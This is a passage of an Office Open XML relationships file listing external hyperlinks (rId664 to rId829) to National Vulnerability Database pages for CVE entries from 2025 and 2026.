Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81906" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84651" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90455" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90461" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48496" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89329" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18495" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18562" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18964" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19797" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19985" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7298" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77150" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77490" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78172" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79035" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81907" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84960" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18061" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18122" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68528" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81533" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81908" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90452" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57164" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63074" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78123" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78126" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78129" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81861" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81909" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82215" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84890" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87123" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87590" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89156" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81911" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81912" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87910" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57843" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77159" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79945" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80056" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80057" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8304" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85378" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85402" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85516" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85638" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85703" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86161" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86183" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86217" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86224" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86262" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86268" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86273" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86305" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86519" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86782" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86808" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86815" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14565" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62133" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62904" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66323" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71351" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11446" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12215" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14562" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21092" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27378" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49462" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49865" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57160" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57165" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57166" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62088" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62114" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62132" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62135" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62136" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62137" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62140" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68526" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79741" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80135" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81913" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82213" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82305" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82535" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86781" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86809" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89179" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89239" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89240" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89241" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89244" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89247" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 